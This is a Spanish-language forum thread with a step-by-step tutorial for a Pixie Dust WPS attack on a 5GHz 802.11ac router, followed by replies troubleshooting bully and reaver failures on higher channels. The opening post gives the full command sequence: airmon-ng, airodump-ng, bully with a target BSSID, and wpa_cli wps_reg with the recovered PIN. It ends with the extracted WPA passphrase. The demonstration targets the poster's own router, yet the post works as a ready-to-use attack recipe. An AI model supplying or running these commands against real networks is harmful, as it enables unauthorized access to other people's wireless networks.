El libre pensamiento para un internet libre
No estas registrado.
Se lee por muchos lados que no hay forma de utilizar las técnicas modernas de crack WPA (explotando la "brecha" llamada WPS y su modo PIN) contra la ultima generación de puntos de acceso.
Me refiero a los routers compatibles con el estándar ac cuya tasa de transmisión puede alcanzar hasta 2167Mbps ("ac3100" y "ac3150")
Incluso no son pocos los temas en el foro aircrack-ng o Kali Linux dónde se afirma que no hay forma de inyectar trafico en la banda 5Ghz.
No es cierto y lo voy a demostrar enseguida realizando en vivo un ataque pixie dust contra un punta de acceso "ac1200": El Alfa Network AC1200R.
Generaré el PIN por defecto con tan solo un solo intento y obtendré la llave WPA del punto de acceso
Si no te ha quedado claro las lineas anteriores un poco de lectura :
Sobre el ataque pixie dust : "Pixie Dust" ataque de fuerza bruta offline para generar el PIN valido
Sobre el estándar ac : Bien entender el estándar "ac" para no caer en la trampa
- Un adaptador wifi con chipset Ralink RT3750 o RT3572
Desgraciadamente son a mi conocimiento los únicos chipset con compatibilidad mode monitor y inyección en banda 5Ghz. Yo usaré un RT3572; es el chipset que lleva la Alfa AWUS052NH
- Un routeur ac con chipset realtek o ralink
Estos modelos de chipset estan soportados por pixiewps lo que significa que obtendremos el PIN en un instante
- Bully modificado por aanarchyy
El ataque pixedust se ha de hacer con bully porque reaver funciona muy mal con los chipsets USB ralink. Para descargar y instalar la mod de aanrchyy ver Bully WPS: La alternativa a Reaver renace con soporte Pixiewps
El crack se hace en dos etapas.
Hacer el ataque pixie dust con bully para obtener el PIN
Mandar el PIN obtenido con wpa_cli para obtener la llave WPA
Debemos hacerlo así porque el chispet rt30572 no anda muy bien con el WPS en modo monitor.
Con reaver ni vale la pena probar
Con bully basta para obtener el M3 y poder hacer un ataque pixie dust pero no se logra llegar hasta el M8 para obtener la llave WPA.
Por lo tanto se ha de usar wpa_cli (comando interactivo para wpa_supplicant) para mandar el PIN y obtener la llave
Enchufamos el Wifi USB con chipset RT3570 o RT3572 en el puerto USB (será muy probablemente la interfaz wlan1 ) y lo ponemos en mode monitor.
Para no tener conflictos con network manager a la hora de mandar el PIN con wpa_cli debemos "matar" a los procesos potencialmente conflictivos.
Por lo tanto hacemos
sudo airmon-ng check kill
Seguido de
sudo airmon-ng start wlan1
Obtenemos una interfaz wlan1mon en modo monitor que usamos para escanear la banda 5Ghz (con airodump-ng)
sudo airodump-ng --wps -b a --manufacturer wlan1mon
Es importante usar las opciones --wps (para ver si el wps esta activado) y -b a (para escanear solo la banda "a" )
Cuando vemos nuestro punto de acceso aramos el escaneo con [CTRL+C] y copiamos su BSSID
Este es el alfa AC1200R con su eSSID por defecto para la red "ac": 11n AP 5G
Podemos lanzar el ataque pixiedust con Bully modificado por AAnarchyy
sudo bully -5 -b 00:C0:CA:85:32:E2 -d -v 4 wlan1mon
-5 : para usar la banda 5Ghz, la que usa el estándar ac
-b <mac_router> : argumento mandatario, ponemos la dirección mac del objetivo
-d : opción para efectuar un ataque pixie dust automaticamente
-v 4 : nivel de salida máximo (verbose); para ver todos los detales en consola
wlan1mon : segundo argumento mandatario, la interfaz que debe ser en modo monitor
Enseguida se obtienen las cadenas para hacer un pixie dust
El PIN por defecto se obtiene en una fracción de segundos...
(Obviamente se necesita tener pixiewps del amigo wiire instalado, la herramienta oficial para hacer ataques pixiedust.)
Bully va a intentar luego obtener la llave WPA mandando el PIN.
Pero no logrará, así que no vale la pena esperar y parramos el proceso con [CTRL+C]
Pasamos a la segunda fase
Para ello solo tenemos que inspirarnos con el buenísimo tutorial de Coeman76 : [ Tutorial ] Conexión WPS desde Linux (Debian,Slax,etc..)
Lo primero es desactivar el mode monitor que no necesitamos.
sudo airmon-ng stop wlan1mon
Y volvemos a tener a nuestra interfaz tipo wlanX en modo managed
Por si a caso se despierta "network manager" lo volvemos "a matar"
sudo airmon-ng check kill
Ahora creamos un archivo de texto para recoger la llave WPA.
Lanzamos nuestro editor de texto favorito (gedit en mi caso) con derechos de administrador
sudo gedit
Copiamos y pegamos estas lineas
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1
Y guardamos el fichero en el directorio /etc llamándolo wpa_supplicant.conf
Ahora lanzamos el demonio de wpa_suplicant de tal forma que vaya rellenando nuestro fichero de configuración en vivo, así:
sudo wpa_supplicant -i wlan1 -c /etc/wpa_supplicant.conf -B
Lanzamos el comando interactivo de wpa_supplicant (se llama wpa_cli) indicando nuestra interfaz
sudo wpa_cli -i wlan1
Volvemos atrás en nuestra consola para copiar el bSSID y el PIN y pegar los en la siguiente linea de ordenes
wps_reg 00:C0:CA:85:32:E2 40899336
Le damos a [ENTER] y observamos lo que sucede en consola :
Todo va muy rápido, un segundo o dos.
Podéis ver en la parte colorida de verde el mensaje de éxito con el bendito :
<3>WPA: Key negotiation completed with 00:c0:ca:85:32:e2 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:c0:ca:85:32:e2 completed [id=1 id_str=]
significa que hemos mandado el PIN y que el router no has devuelto la llave WPA
El prompt de wpa_cli vuelve a aparecer y si entramos el comando
status
Vemos los detalles del Punto de Acceso con el cuál hemos llevado a cabo nuestra transacción WPS :
Paramos wpa_cli tecleando
quit
Y volvemos a activar Network Manager con
sudo restart network-manager
Ahora recogemos la llave WPA que se ha guardado en el fichero /etc/wpa_supplicant.conf que hemos creado anteriormente
cat /etc/wpa_suplicant.conf
¡Ojo!
La contraseña esta entre comillas (") y no forman parte de la contraseña
O sea, obtengo
psk="wifilibre43ver"
Y debo copiar unicamente wifilibre43ver.
Esta es la contraseña...
Comprobando la validez del proceso ....
¡Estoy conectado a mi Punto de Acceso ac1200 con su tasa de 867Mbps!
Así se lleva un crack WPS contundente contra un router "ac"... Mission is possible!
Desconectado
para quitarse el sombrero,yo los fines de semanas suelo ir ha mi pueblo y ahi unas pocas 5g voy ha intentarlo.jajajajajajaj
Desconectado
Me doy cuenta que en el tema hablo solo de los chispet USB Ralink pero se debería poder hacer (y solo con reaver) con algunos chipsets internos Intel y Broadcom que tienen soporte ac y soporte mode monitor & inyección.
¡Saludos!
Desconectado
Hola a todos,bueno despues de llevar un tiempo por aqui y leer infinidad de post,me detuve a probar este nuevo tipo de ataque sobre mi propia red,la verdad que despues de revisar una y otra vez...no encuentro donde esta el problema,expongo mi caso,realizo todos los pasos descritos por kcdtv pero llego al punto en el que lanzo bully y se me queda trabado a la escucha en la banda de 5ghz hasta llegar al canal 58 en el cual se detiene y no avanzo nada mas,aclaro que actualmente uso un adaptador Alfa AWUS052NG el cual trae en su interior el famoso Ralink RT3572,adjunto captura de consola por si alguien sabe solventar el fallo o darme un poco de luz en el asunto,gracias.
Imagen :
Desconectado
Buenos días
¿Has deshabilitado Network Manager?
Bully no consigue fijar la interfaz en el canal correcto y puede ser por culpa de procesos conflictivos.
Podría ser un asunto de versiones-drivers-kernel.
¿Tu sistema está bien al día?
Desconectado
Buenos días
¿Has deshabilitado Network Manager?
Bully no consigue fijar la interfaz en el canal correcto y puede ser por culpa de procesos conflictivos.
Podría ser un asunto de versiones-drivers-kernel.
¿Tu sistema está bien al día?
Hola de nuevo,previamente deshabilito Network Manager mediante (airmon-ng check kill),en que distribucion se realizaron las pruebas del tutorial?decir que mis pruebas realizadas fueron en kali-linux.
root@kali:~# cat /etc/*-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2017.1"
VERSION_ID="2017.1"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"
root@kali:~#
Ultima edición por carlitomorao (05-09-2017 12:15:11)
Desconectado
Pon aquí el final de dmesg para ahorrar preguntas.
sudo dmesg
Usa la opción insertar código y no pongas todo, solo el final, para ver el falló.
Para ver la versión es más completo con
uname -a
Desconectado
Pon aquí el final de dmesg para ahorrar preguntas.
![]()
sudo dmesg
Usa la opción insertar código y no pongas todo, solo el final, para ver el falló.
Para ver la versión es más completo conuname -a
Ahi va a ver si te sirve.
Desconectado
OK.
No se ve ningún problema "mecánico" y se ve que el problema viene de bully
Bueno, accabo de probar y hay un problema con el bully tal y como está en Kali ahora:
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[X] Unknown frequency '-1113135872' reported by interface 'wlan1mon'
[!] Using '4c:bb:58: for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '18:44:e6' on channel 'unknown'
[+] Switching interface 'wlan1mon' to channel '36'
[!] ioctl(SIOCSIWFREQ) on 'wlan1mon' failed with '-1'
[X] Unable to set channel on 'wlan1mon', exiting
El valor aquí "Unknown frequency '-1113135872' " es problemático
He usado también mi rt3572
No sé porque hay esta cadena "111313". si no estaría se tendría la frecuencia correcta: 5,872 Ghz
Al final reventa al llegar al canal 54...
[+] Switching interface 'wlan0mon' to channel '36'
[+] Switching interface 'wlan0mon' to channel '40'
[+] Switching interface 'wlan0mon' to channel '44'
[+] Switching interface 'wlan0mon' to channel '48'
[+] Switching interface 'wlan0mon' to channel '52'
[+] Switching interface 'wlan0mon' to channel '56'
[+] Switching interface 'wlan0mon' to channel '58'
[!] ioctl(SIOCSIWFREQ) on 'wlan0mon' failed with '-1'
[X] Unable to set channel on 'wlan0mon', exiting
No pasa del 58...
Prueba con tu router configurado en el canal 40, será más simple
Desconectado
Hola de nuevo,segui tu consejo y probe a bajar de frecuencia del canal 100 que estaba mi red al canal 40,ahora los resultados son distintos,ni siquiera sale el primer canal en 5ghz a la escucha,asi lleva ya alrededor de 20 minutos y no se mueve de ahi.
root@kali:~# sudo bully -5 -b xx:xx:xx:xx:xx:xx -d -v 4 wlan0mon
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[X] Unknown frequency '-1230650368' reported by interface 'wlan0mon'
[!] Using '00:c0:ca:95:7a:1f' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'xx:xx:xx:xx:xx:xx' on channel 'unknown'
Desconectado
Bueno... He probado un poco más y te propongo esta solución:
Instalas la ultima revisión de bully:
git clone https://github.com/aanarchyy/bully
cd bully/src/
make
sudo make install
Configuras tu router en le canal 36 (supongo que 40 está bien)
Antes de lanzar el ataque con bully fijas bien el canal y el objetivo con un scan con airodump-ng en una consola
sudo airodump-ng --bssid <mac_objetivo> --channel <numero_canal>
En otra consola lanzas bully
Así va muy rápido para hacer un pixiedust en frecuencias 5Ghz:
Desconectado
Bien ahora si,realizadas las pruebas en el canal 36 parece que todo funciona correctamente,al aumentar de canal al 40 de nuevo continua el error,no ahi manera de llegar con el ataque mas alla de dicho canal por el momento a mi entender,creo que se debe a algun fallo en la compilacion del codigo de bully,seguiremos esperando novedades,gracias por tus aclaraciones y comprension,un saludo.
Ultima edición por carlitomorao (06-09-2017 14:20:52)
Desconectado
Felicidades por el buen trabajo y por los temas tan interesantes.
A mi tambien me pasa lo mismo que no avanza del canal 58.
He hecho todo lo que comenta al usuario carlitomorao pero no hay forma de que avance.
Si lo pongo en el canal 36 si que funciona pero a partir de ahi no.
Si existe alguna version o modificacion de algo que funcione, me gustaria que lo reportara.
Muchas gracias y buen trabajo.
Desconectado
A mi pasa lo mismo, no puedo inyectar tráfico a partir del canal 58 con WifiSlax 1.1 64 bits, sabe alguien si con otra versión funciona.
Desconectado
Seamos precisos para no prestar a confusión.
Estamos hablando de bully, no de inyección "en general".
Todos los chipsets ralink de doble banda que usan el driver rt2800usb son capaces de inyectar en todos los canales de la banda 5Ghz.
Es un bug propio a Bully (y que tiene pinta de ser algo tipo "buffer overflow" al momento de manejar los "radiotap headers")
La cosa es que haría falta retocar el código fuente de bully. Bueno, es lo que deduzco.
Puedes eventualemnte probar con un viejo SO del 2013-2014 con librerias de la epoca (sin actualizar) para ver si funciona con las liberias de la época.
A falta de arreglar el fallo y de poder usar bully en un SO moderno, es el único "plan B para Bully" que se me ocurre.
saludos
Desconectado
Ok, gracias kcdtv, bueno para ser más preciso me pasa tanto con bully como con reaver.
También hecho el aireplay-ng mon0 -9 para probar el test de inyección de la última mac probada, pues bien en las que saca el pin válido si que inyecta perfectamente (hasta el 58), pero en las que no, tampoco inyecta, ya sea con bully o reaver.
"buffer overflow" y "radiotap headers" de momento son palabras mayores para mi, pero bueno poco a poco iré aprendiendo.
Ah, también he probado con los dos chip el rt2800usb y el que lleva incorporado mi portátil de intel y hace lo mismo, por lo que supongo que será algún fallo de las librerias de la programación de la radio en 5ghz. Actualizé los drivers y tampoco se resolvió el problema.
Probaré con otras versiones a ver, si saco algo en claro ya lo publico.
Ultima edición por joking (02-10-2017 18:09:05)
Desconectado
Hola de nuevo,personalmente por motivos de hardware no he podido hacer mas pruebas en la banda de 5Ghz,tan solo dispongo de un adaptador con el rt3572 con lo que reaver nada de na en dicha banda y bully llegue hasta donde deje mi ultimo post en el hilo,tambien por falta de tiempo,a la espera de alguna novedad en bully y poder darle vidilla al hilo nuevamente,un saludo.
Desconectado
Gracias por aportar estas precisiones porque me doy cuenta que el parche paras los realtek (injection fails on certains AP in 5Ghz) no basta para arreglar el fallo de los ralink.
Hay efectivamente un asunto general de compatibilidad 5Ghz detrás del crash de bully con el rt3572 (y también con rt3570 : mismo driver)
Inyecta en los canales que fallan pero no procesa las respuestas,
0% de tasa de inyección cuando se ven claramente mis clientes fakes asociados (si están asociados es que han obtenido una respuesta probe).
Fuck!
Bueno... Mirando las cosas del lado positivo: Estudiar (y resolver) este bug nos va a permitir mejorar reaver con los Ralink
Y será aún más simple hacer un ataque pixiedust en banda 5Ghz
Ya comentaré algo cuando se haya analizado capturas con varios ojos. Hasta la próxima...
Desconectado
Gracias a ti por tu rapida respuesta y dedicación,a la espera de novedades para probar nuevamente....un saludo para todos/as lectores.
Desconectado
Hola, buenas a todos, el caso que yo voy sacando algo en claro, resulta que el canal de vez en cuando se cambia de forma automática en el router y cuado esta por el canal 58 o más abajo si se le puede atacar, pero el problema está en todas las versiones de wifislax.
Lo que voy ha decir a continuación es una hipótesis, por lo que entiendo de programación creo que a la hora de auditar las canales de radio se ha utilizado una variable "entero simple" que va de 0 hasta 65535, entonces cuando la frecuencia es mayor de 65000khz se pasa a negativo por lo que da error.
La solución es utilizar en el código fuente de reaver y bully una variable "entero largo" que va hasta 2147483647.
Repido es una teoría pero no se si será esto, lo digo por si alguien con conocimientos avanzados en programación le puede echar un vistazo al código fuente.
Desconectado
Lo que voy ha decir a continuación es una hipótesis, por lo que entiendo de programación creo que a la hora de auditar las canales de radio se ha utilizado una variable "entero simple" que va de 0 hasta 65535, entonces cuando la frecuencia es mayor de 65000khz se pasa a negativo por lo que da error.
¡Ole!
Me parece muy pertinente.
Esta noche hablaremos de estos temas con rofl0r y le hablaré de tu hipótesis. Muchas Gracias,
Desconectado
Bueno, supongo que no sería ese el problema, habrá que seguir investigando porque a partir del canal 58 deja de funcionar.
Desconectado
Mejor tarde que nunca...
Ataque pixiedust con Ralink RT3572 y reaver 1.6.4 en canales superiores al 58.
La razón de nuestras desgracias es... la configuración de los parámetros regionales (iw reg)
He escrito un tema para explicar el asunto: Elucidando el misterio "Inyección imposible en ciertos canales 5Ghz"
edit: Con reaver hay que emplear el argumento -N cuando uséis los Ralink, sino tendréis fallos muchas veces.
Ultima edición por kcdtv (07-02-2018 12:03:15)
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
|
26 | 7673 | 15-03-2023 16:57:32 por kcdtv |
Pegado: |
34 | 3752 | 12-03-2023 18:24:22 por Guybrush92 |
Pegado: |
436 | 63507 | 07-03-2023 12:35:27 por kcdtv |
0 | 405 | 23-02-2023 17:09:39 por kcdtv | |
114 | 258448 | 19-02-2023 17:36:14 por chuchof |
Ultimo usuario registrado: trdmexico
Usuarios registrados conectados: 0
Invitados conectados: 6
Número total de usuarios registrados: 2,431
Número total de temas: 1,632
Número total de mensajes: 15,528
Atom tema feed - Impulsado por FluxBB